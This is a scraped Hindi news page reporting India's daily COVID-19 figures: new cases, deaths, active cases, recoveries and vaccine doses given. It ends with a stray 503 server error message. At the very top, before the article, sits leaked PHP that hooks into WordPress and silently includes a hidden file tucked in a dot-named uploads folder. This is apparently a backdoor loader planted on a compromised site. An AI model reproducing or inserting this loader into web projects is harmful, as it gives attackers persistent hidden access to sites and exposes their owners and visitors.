add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कोरोना के नए मामलों में आज दर्ज की गई बढ़ोतरी, पिछले 24 घंटों में 1938 मामले सामने आए – SOCH INDIA
Menu

देश
कोरोना के नए मामलों में आज दर्ज की गई बढ़ोतरी, पिछले 24 घंटों में 1938 मामले सामने आए

nobanner

देश में जानलेवा कोरोना वायरस (Coronavirus) महामारी के नए मामलों में आज भी बढ़ोतरी दर्ज की गई है. देश में पिछले 24 घंटों में कोरोना वायरस के एक हजार 1938 नए केस सामने आए हैं और 67 लोगों की मौत (Covid Deaths) हो गई. कल कोरोना के 1 हजार 778 केस दर्ज किए गए थे और 62 लोगों की मौत हुई थी. देश में अबतक कोरोना के 4 करोड़ 30 लाख 14 हजार 687 मामले सामने आ चुके हैं. जानिए देश में कोरोना की ताजा स्थिति क्या है.

एक्टिव केस घटकर 22 हजार 427 हुए

केन्द्रीय स्वास्थ्य मंत्रालय की ओर से जारी किए गए आंकड़ों के मुताबिक, कल देश में 2 हजार 531 लोग ठीक हुए, जिसके बाद अब एक्टिव मामलों की संख्या घटकर 22 हजार 427 हो गई है. वहीं, इस महामारी से जान गंवाने वालों की संख्या बढ़कर 5 लाख 16 हजार 672 हो गई है. आंकड़ों के मुताबिक, अभी तक 4 करोड़ 24 लाख 75 हजार 588 लोग संक्रमण मुक्त हो चुके हैं.

अबतक 182 करोड़ से ज्यादा खुराक दी गईं

 

राष्ट्रव्यापी टीकाकरण मुहिम के तहत अभी तक कोरोना वायरस रोधी टीकों (Corona Vaccine) की 182 करोड़ से ज्यादा खुराक दी जा चुकी हैं. कल 31 लाख 81 हजार 809 डोज़ दी गईं, जिसके बाद अबतक वैक्सीन की 182 करोड़ 23 लाख 30 हजार 356 डोज़ दी जा चुकी हैं. केन्द्रीय स्वास्थ्य मंत्रालय के मुताबिक, स्वास्थ्यकर्मियों, कोरोना योद्धाओं और 60 साल से ज्यादा आयु वाले अन्य बीमारियों से ग्रस्त लोगों को 2 करोड़ से ज्यादा (2,21,21,816) एहतियाती टीके लगाए गए हैं. देश में कोविड रोधी टीकाकरण अभियान 16 जनवरी, 2021 से शुरू हुआ और पहले चरण में स्वास्थ्य कर्मियों को टीका लगाया गया. वहीं, कोरोना योद्धाओं के लिए टीकाकरण अभियान दो फरवरी से शुरू हुआ था.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.